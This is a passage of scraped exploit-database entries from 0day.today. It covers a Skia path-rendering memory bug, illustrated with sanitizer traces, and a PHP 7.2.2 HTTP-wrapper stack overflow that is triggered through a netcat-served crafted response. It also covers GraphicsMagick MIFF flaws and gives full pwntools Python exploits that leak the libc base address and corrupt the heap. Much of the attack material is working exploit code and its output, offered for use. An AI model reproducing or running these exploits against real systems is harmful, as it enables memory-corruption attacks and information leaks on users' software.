/usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1187\r\n #5 0x1465fa4 in aaa_fill_path(SkPath const&, SkIRect const&, AdditiveBlitter*, int, int, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1669\r\n #6 0x1465fa4 in SkScan::AAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1713\r\n #7 0xad5687 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:844:9\r\n #8 0xad6cf6 in SkScan::AntiFillPath(SkPath const&, SkRasterClip const&, SkBlitter*, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:883:9\r\n #9 0x9c5902 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1018:5\r\n #10 0x9c64b9 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1101:11\r\n #11 0x13478f3 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.h:56:15\r\n #12 0x13478f3 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBitmapDevice.cpp:407\r\n #13 0x98e9ce in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:2141:23\r\n #14 0x983f71 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:1694:11\r\n #15 0x69add0 in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../example/SkiaSDLExample.cpp:63:10\r\n #16 0x7ff1044112b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n #17 0x5ab0e9 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/SkiaSDLExample+0x5ab0e9)\r\n\r\nAddress 0x7ffc5c8950d4 is located in stack of thread T0 at offset 52 in frame\r\n #0 0xac421f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:87\r\n\r\n This frame has 2 object(s):\r\n [32, 38) 'runs'\r\n [64, 66) 'aa' <== Memory access at offset 52 underflows this variable\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26 in SkAlphaRuns::Break(short*, unsigned char*, int, int)\r\nShadow bytes around the buggy address:\r\n 0x10000b90a9c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90a9d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90a9e0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 f2\r\n 0x10000b90a9f0: f2 f2 f2 f2 04 f2 04 f3 00 00 00 00 00 00 00 00\r\n 0x10000b90aa00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x10000b90aa10: 00 00 00 00 f1 f1 f1 f1 06 f2[f2]f2 02 f3 f3 f3\r\n 0x10000b90aa20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa30: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10000b90aa60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==139872==ABORTING\r\n\r\n################################################################################\r\n\r\nAnother variant of this issue can be triggered while rendering a concave path with SkScan::SAAFillPath algorithm.\r\n\r\nWhen drawing a path with SkScan::SAAFillPath, if the path is concave but Skia thinks it's convex, this can lead to SuperBlitter::blitH without respecting the the top-to-bottom, left-to-right order. In this case, this leads to SkAlphaRuns::add also being called out-of-order, which leads to SkAlphaRuns::Break being called with a negative \"x\" argument, which leads to uninitialized memory being read here:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&l=150&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c\r\nWhich then leads to out-of-bounds reads/writes on the following lines:\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=155\r\n\r\nThis issue is also triggerable in Chrome by simply drawing a path to the canvas.\r\n\r\nSkia and Chrome PoCs are attached.\r\n\r\n\r\nMSan log from Skia:\r\n\r\n==55058==WARNING: MemorySanitizer: use-of-uninitialized-value\r\n #0 0xcb9188 in SkAlphaRuns::Break(short*, unsigned char*, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:155:17\r\n #1 0xcb9188 in SkAlphaRuns::add(int, unsigned int, int, unsigned int, unsigned int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:83\r\n #2 0xcb9188 in SuperBlitter::blitH(int, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:251\r\n #3 0xce2e0e in walk_convex_edges(SkEdge*, SkPath::FillType, SkBlitter*, int, int, void (*)(SkBlitter*, int, bool)) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:278:30\r\n #4 0xce0b79 in sk_fill_path(SkPath const&, SkIRect const&, SkBlitter*, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:488:9\r\n #5 0xcbc6f3 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:737:9\r\n #6 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9\r\n #7 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5\r\n #8 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11\r\n #9 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15\r\n #10 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407\r\n #11 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23\r\n #12 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11\r\n #13 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10\r\n #14 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n #15 0x5af729 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5af729)\r\n\r\n Uninitialized value was created by a heap allocation\r\n #0 0x5b799c in __interceptor_malloc (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5b799c)\r\n #1 0xdb06dd in sk_malloc_flags(unsigned long, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/ports/SkMemory_malloc.cpp:71:13\r\n #2 0xb0b9c7 in sk_malloc_throw(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../include/private/SkMalloc.h:59:12\r\n #3 0xb0b9c7 in SkAutoMalloc::reset(unsigned long, SkAutoMalloc::OnShrink) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAutoMalloc.h:53\r\n #4 0xb0b9c7 in SkBlitter::allocBlitMemory(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBlitter.h:137\r\n #5 0xcb6c9d in SuperBlitter::SuperBlitter(SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:159:32\r\n #6 0xcbc648 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:736:22\r\n #7 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9\r\n #8 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5\r\n #9 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11\r\n #10 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15\r\n #11 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407\r\n #12 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23\r\n #13 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11\r\n #14 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10\r\n #15 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)\r\n\r\n################################################################################\r\n\r\nA third variant of this, which is also exploitable in Chrome (I just linked to the ClusterFuzz testcase) is when a path is rendered SkScan::SAAFillPath with a MaskSuperBlitter. In this case, rendering concave path as convex leads to \"x\" coordinate being increased beyond the image bounds, which leads to incrementing out-of-bounds data in\r\nhttps://skia.googlesource.com/skia/+/fa7df23d8b0c4121adfc5ad45c295e7077fad3f5/src/core/SkScan_AntiPath.cpp#483\r\n\r\nNote: ptr normally points inside\r\nhttps://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_AntiPath.cpp?type=cs&g=0&l=435&rcl=05caa69a3f5aa45fd230ec302e6da1522d993747\r\nwhich is (in this case) allocated on the stack, so this variant gives us a stack out-of-bounds increment by a chosen small value, which is a pretty nice exploitation primitive.\r\n\r\nPoCs for Skia and Chrome are attached.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46332.zip\n\n# 0day.today [2019-02-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32141"}, {"lastseen": "2018-06-06T21:48:51", "bulletinFamily": "exploit", "description": "Exploit for php platform in category dos / poc", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "1337DAY-ID-30541", "href": "https://0day.today/exploit/description/30541", "title": "PHP 7.2.2 - php_stream_url_wrap_http_ex Buffer Overflow Exploit", "type": "zdt", "sourceData": "Description:\r\n------------\r\nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:\r\n \r\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n \r\n if (tmp_line[tmp_line_len - 1] == '\\n') {\r\n --tmp_line_len;\r\n if (tmp_line[tmp_line_len - 1] == '\\r') {\r\n --tmp_line_len;\r\n }\r\n}\r\n \r\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.\r\n \r\n$ bin/php --version\r\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\r\nCopyright (c) 1997-2018 The PHP Group\r\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\r\n \r\n \r\nTest script:\r\n---------------\r\n$ xxd -g 1 poc\r\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\r\n \r\n$ nc -vvlp 8080 < poc\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\r\nGET / HTTP/1.0\r\nHost: localhost:8080\r\nConnection: close\r\n \r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n \r\nExpected result:\r\n----------------\r\nNO CRASH\r\n \r\nActual result:\r\n--------------\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n=================================================================\r\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\r\nREAD of size 1 at 0xbfc038ef thread T0\r\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\r\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\r\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\r\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\r\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\r\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\r\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\r\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\r\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\r\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\r\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\r\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\r\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\r\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\r\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\r\n This frame has 13 object(s):\r\n [32, 36) 'transport_string'\r\n [96, 100) 'errstr'\r\n [160, 164) 'http_header_line_length'\r\n [224, 232) 'timeout'\r\n [288, 296) 'req_buf'\r\n [352, 360) 'tmpstr'\r\n [416, 432) 'ssl_proxy_peer_name'\r\n [480, 496) 'http_header'\r\n [544, 576) 'buf'\r\n [608, 736) 'tmp_line'\r\n [768, 1792) 'location'\r\n [1824, 2848) 'new_path'\r\n [2880, 3904) 'loc_path'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\r\nShadow bytes around the buggy address:\r\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\r\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\r\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\r\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\r\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap righ redzone: fb\r\n Freed Heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==26249== ABORTING\r\nAborted\n\n# 0day.today [2018-06-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30541"}, {"lastseen": "2018-04-03T00:19:14", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://0day.today/exploit/description/28948", "id": "1337DAY-ID-28948", "type": "zdt", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow Exploit", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n \r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n \r\nThe vulnerabilities found are:\r\n \r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n \r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n \r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n \r\n \r\nVulnerabilities details\r\n \r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n \r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n \r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n \r\nThe code which triggers the vulnerable code path is:\r\n \r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n \r\n \r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n \r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n \r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n \r\n \r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n \r\n \r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n \r\n \r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n \r\n \r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n \r\n \r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n \r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n \r\nProof of Concept\r\n \r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n \r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n \r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n \r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n \r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n \r\n \r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n \r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n \r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n \r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n \r\n \r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/28948", "cvss": 